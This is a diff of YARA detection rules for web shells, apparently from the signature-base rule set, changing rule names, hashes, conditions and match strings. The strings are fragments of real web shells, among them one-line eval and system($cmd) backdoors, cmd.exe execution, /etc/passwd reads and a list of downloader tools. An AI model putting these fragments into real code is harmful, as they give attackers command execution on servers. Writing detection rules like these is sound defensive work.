-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L171-L185"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1266-L1279"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "29420106d9a81553ef0d1ca72b9934d9"
-		logic_hash = "2de48b8640c0f2089a4a0badb4429127cb61ac972459290041e20b959e4e0c05"
+		hash = "0061d800aee63ccaf41d2d62ec15985d"
+		logic_hash = "90920258017cf189da128dce477e71f0040bc66aefa6f018f64db64d22f60ae5"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
-		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
+		$s9 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_12302
+rule SIGNATURE_BASE_Webshell_Worse_Linux_Shell_1
 {
 	meta:
-		description = "Web Shell - file 12302.jsp"
+		description = "Web Shell - file Worse Linux Shell.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
+		old_rule_name = "webshell_Worse_Linux_Shell"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L186-L201"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1280-L1294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a3930518ea57d899457a62f372205f7f"
-		logic_hash = "0959a138abc791f17344e25e84b24888ddfe238981fc7e3ffd76c0390006ea46"
+		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
+		logic_hash = "a24e7ae7c722da7f265f032315b1e8e402c2fc4a2a54a685671a9e52124f6553"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword
-		$s1 = "<%@page import=\"java.io.*,java.util.*,java.net.*\"%>" fullword
-		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+		$s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Caidao_Shell_Guo
+rule SIGNATURE_BASE_Webshell_Zacosmall
 {
 	meta:
-		description = "Web Shell - file guo.php"
+		description = "Web Shell - file zacosmall.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L202-L216"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1295-L1308"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9e69a8f499c660ee0b4796af14dc08f0"
-		logic_hash = "efb7055f42dd6be41ea3983cacea1a70b83675c8ebcb88ae3b250066a29e94eb"
+		hash = "5295ee8dc2f5fd416be442548d68f7a6"
+		logic_hash = "739d58e3ab6712c703e0cb0e0070afec3376844b77ed081a5d12407cabb62319"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php ($www= $_POST['ice'])!"
-		$s1 = "@preg_replace('/ad/e','@'.str_rot13('riny').'($ww"
+		$s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Redcod
+rule SIGNATURE_BASE_Webshell_Liz0Zim_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit
 {
 	meta:
-		description = "Web Shell - file redcod.php"
+		description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L217-L231"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1309-L1322"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5c1c8120d82f46ff9d813fbe3354bac5"
-		logic_hash = "eddfd90d27793756bcc685ffe33b2dabc3bb28b9654c33a0f99359e8b6f13678"
+		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+		logic_hash = "9630fc0371193bfbd0bd4fb15856477e7739fc9f11ee539d119ee837b1a54502"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw" fullword
-		$s1 = "HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm" fullword
+		$s1 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Remview_Fix
+rule SIGNATURE_BASE_Webshell_Redirect
 {
 	meta:
-		description = "Web Shell - file remview_fix.php"
+		description = "Web Shell - file redirect.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L232-L246"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1323-L1336"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a24b7c492f5f00e2a19b0fa2eb9c3697"
-		logic_hash = "0b29ef74fb0786aefe99281360dc4fe27005eac345a36bc14259afa6fc555303"
+		hash = "97da83c6e3efbba98df270cc70beb8f8"
+		logic_hash = "b16026623fe7802db9823ad4a3dab051747eea6bd41ce72a0c8c6757bfa2c6f7"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
-		$s5 = "echo \"<P><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n"
+		$s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" "
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Cmd
+rule SIGNATURE_BASE_Webshell_Jsp_Cmdjsp
 {
 	meta:
-		description = "Web Shell - file cmd.asp"
+		description = "Web Shell - file cmdjsp.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L247-L262"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1337-L1350"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "895ca846858c315a3ff8daa7c55b3119"
-		logic_hash = "8e72b54267c2f83b288cdd43ccd56ae4ab1f95c17f4dde077e637d951df54866"
+		hash = "b815611cc39f17f05a73444d699341d4"
+		logic_hash = "b4822e47a27c598be746ac71bf9b60dafe08d50c83a2dfee5e40ea384fcff21a"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
-		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
-		$s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+		$s5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Sh_Server
+rule SIGNATURE_BASE_Webshell_Java_Shell
 {
 	meta:
-		description = "Web Shell - file server.php"
+		description = "Web Shell - file Java Shell.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L263-L276"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1351-L1365"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d87b019e74064aa90e2bb143e5e16cfa"
-		logic_hash = "9f4d940a381e7bd298a252f485d5f1d26fd191c27f6e86e8fa6028237592a8c3"
-		score = 50
+		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
+		logic_hash = "0d313ff81a36b456326df0054853c31d69710fc142fcfa65747691238af4e635"
+		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "eval(getenv('HTTP_CODE'));" fullword
+		$s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword
+		$s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_PH_Vayv_PH_Vayv
+rule SIGNATURE_BASE_Webshell_Asp_1D
 {
 	meta:
-		description = "Web Shell - file PH Vayv.php"
+		description = "Web Shell - file 1d.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L277-L291"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1366-L1379"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "35fb37f3c806718545d97c6559abd262"
-		logic_hash = "8769400b7b6828849f27092d790d291721c7e1b39dfd2080de5da8e59dd25523"
+		hash = "fad7504ca8a55d4453e552621f81563c"
+		logic_hash = "85b17fde8fb535b64e5eabc887428d9b73adc5bc6741a3a387f235a8b0c6089a"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in"
-		$s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style"
+		$s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Caidao_Shell_Ice
+rule SIGNATURE_BASE_Webshell_Jsp_Ixrbe
 {
 	meta:
-		description = "Web Shell - file ice.asp"
+		description = "Web Shell - file IXRbE.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L292-L305"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1380-L1393"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6560b436d3d3bb75e2ef3f032151d139"
-		logic_hash = "d92cc9ac8630b40f23b9ff7cda5a237b4885d30de4b9b497be7512e7eb020a09"
+		hash = "e26e7e0ebc6e7662e1123452a939e2cd"
+		logic_hash = "8710d092b81c5de1e328ad6e57e5c4a25748cc92844198038c103dabc1e76e77"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%eval request(\"ice\")%>" fullword
+		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Cihshell_Fix
+rule SIGNATURE_BASE_Webshell_PHP_G5
 {
 	meta:
-		description = "Web Shell - file cihshell_fix.php"
+		description = "Web Shell - file G5.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L306-L320"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1394-L1407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3823ac218032549b86ee7c26f10c4cb5"
-		logic_hash = "59ae76d6828d8c0ddcbafa19063e6dcf25c826386f46df2b8f9674b628365a2b"
+		hash = "95b4a56140a650c74ed2ec36f08d757f"
+		logic_hash = "2edffbea5142ef146cec57cb88b473532f56ab3e95151c5648eaeabe6a75feda"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty"
-		$s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos"
+		$s3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Shell
+rule SIGNATURE_BASE_Webshell_PHP_R57142
 {
 	meta:
-		description = "Web Shell - file shell.asp"
+		description = "Web Shell - file r57142.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L321-L335"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1408-L1421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e63f5a96570e1faf4c7b8ca6df750237"
-		logic_hash = "5cc698e4ff23ca296b339589d12c24e67c99272e73445604a4552d3023e19636"
+		hash = "0911b6e6b8f4bcb05599b2885a7fe8a8"
+		logic_hash = "3afa0463de3acb12480dba1b2ab9cd53fca88216ba54c5e044e48ebd84bf17bd"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword
-		$s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword
+		$s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Private_I3Lue
+rule SIGNATURE_BASE_Webshell_Jsp_Tree
 {
 	meta:
-		description = "Web Shell - file Private-i3lue.php"
+		description = "Web Shell - file tree.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L336-L349"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1422-L1436"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "13f5c7a035ecce5f9f380967cf9d4e92"
-		logic_hash = "274586f2c451eda45c3a52b615961dbba806f8d25e34cc358e661fcfd1143d08"
+		hash = "bcdf7bbf7bbfa1ffa4f9a21957dbcdfa"
+		logic_hash = "180aa4572a42d23f3e44589f876356ec973fd64cdd53bac69936b93699888ac2"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s8 = "case 15: $image .= \"\\21\\0\\"
+		$s5 = "$('#tt2').tree('options').url = \"selectChild.action?checki"
+		$s6 = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Up
+rule SIGNATURE_BASE_Webshell_C99Madshell_V_3_0_Smowu
 {
 	meta:
-		description = "Web Shell - file up.php"
+		description = "Web Shell - file smowu.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L350-L365"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1437-L1451"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7edefb8bd0876c41906f4b39b52cd0ef"
-		logic_hash = "22f444ce4068f46c0b57e566faca0c6377346e403de592b0e51869781fda31a9"
+		hash = "74e1e7c7a6798f1663efb42882b85bee"
+		logic_hash = "d84a5c573b89790efdbe67a684feb7db88521027e86b7588f090696fd90cbc87"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword
-		$s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword
-		$s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword
+		$s2 = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for"
+		$s8 = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Mysql_Interface_V1_0
+rule SIGNATURE_BASE_Webshell_Simple_Backdoor
 {
 	meta:
-		description = "Web Shell - file Mysql interface v1.0.php"
+		description = "Web Shell - file simple-backdoor.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L366-L379"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1452-L1467"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a12fc0a3d31e2f89727b9678148cd487"
-		logic_hash = "baa938c4cfd2c46b1752d866e186d76a04c353617d8ec3e0d78a3c546b120d13"
+		hash = "f091d1b9274c881f8e41b2f96e6b9936"
+		logic_hash = "252285e8a796757235d775427e5a73980d065c1221190545428910a77f46bb9a"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return"
+		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+		$s1 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s4 = "system($cmd);" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Php_S_U
+rule SIGNATURE_BASE_Webshell_PHP_404
 {
 	meta:
-		description = "Web Shell - file s-u.php"
+		description = "Web Shell - file 404.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L380-L393"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1468-L1481"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "efc7ba1a4023bcf40f5e912f1dd85b5a"
-		logic_hash = "3c6904fa475784e737275fd47eabea077bed57e920071c68fa09f7defecbdb72"
+		hash = "078c55ac475ab9e028f94f879f548bca"
+		logic_hash = "b0524ecddf990048e3e40f471c24075c0e87654c6fe40f17dc3ff43743402e24"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea"
+		$s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Phpshell_2_1_Config
+rule SIGNATURE_BASE_Webshell_Macker_S_Private_Phpshell
 {
 	meta:
-		description = "Web Shell - file config.php"
+		description = "Web Shell - file Macker's Private PHPShell.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L394-L407"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1482-L1497"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bd83144a649c5cc21ac41b505a36a8f3"
-		logic_hash = "51d16bcaef5f6795ebcd1154dca79d5cf5a389948b0e59f4939c30fef877e816"
+		hash = "e24cbf0e294da9ac2117dc660d890bb9"
+		logic_hash = "4bccc1aca8698e601133436a55538c08e3e1fa113a0776c04590eaf4a10fd309"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "; (choose good passwords!).  Add uses as simple 'username = \"password\"' lines." fullword
+		$s3 = "echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>Server's PHP Version:&n"
+		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
+		$s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_EFSO_2
+rule SIGNATURE_BASE_Webshell_Antichat_Shell_V1_3_2
 {
 	meta:
-		description = "Web Shell - file EFSO_2.asp"
+		description = "Web Shell - file Antichat Shell v1.3.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L408-L421"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1498-L1511"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a341270f9ebd01320a7490c12cb2e64c"
-		logic_hash = "19bd00fabe0b4695129c180dd145e757e0b2c2a6dad751e8c889222c191e03ce"
+		hash = "40d0abceba125868be7f3f990f031521"
+		logic_hash = "d5a1dc31f442f8db7771ee64164436f6c562ef9f4a203a1e2006d37f9df91846"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB"
+		$s3 = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Up
+rule SIGNATURE_BASE_Webshell_Safe_Mode_Breaker
 {
 	meta:
-		description = "Web Shell - file up.jsp"
+		description = "Web Shell - file Safe mode breaker.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L422-L435"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1512-L1526"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "515a5dd86fe48f673b72422cccf5a585"
-		logic_hash = "77c8121d000c45e44717689dec535fde7c9722005d1e4ff40d0b84abcf289f47"
+		hash = "5bd07ccb1111950a5b47327946bfa194"
+		logic_hash = "4adcefc05413a02653a2a405791345a1a76058a39f6e2b03765c4485f7c6b106"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "// BUG: Corta el fichero si es mayor de 640Ks" fullword
+		$s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is("
+		$s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)."
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Networkfilemanagerphp
+rule SIGNATURE_BASE_Webshell_Sst_Sheller
 {
 	meta:
-		description = "Web Shell - file NetworkFileManagerPHP.php"
+		description = "Web Shell - file Sst-Sheller.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L436-L449"
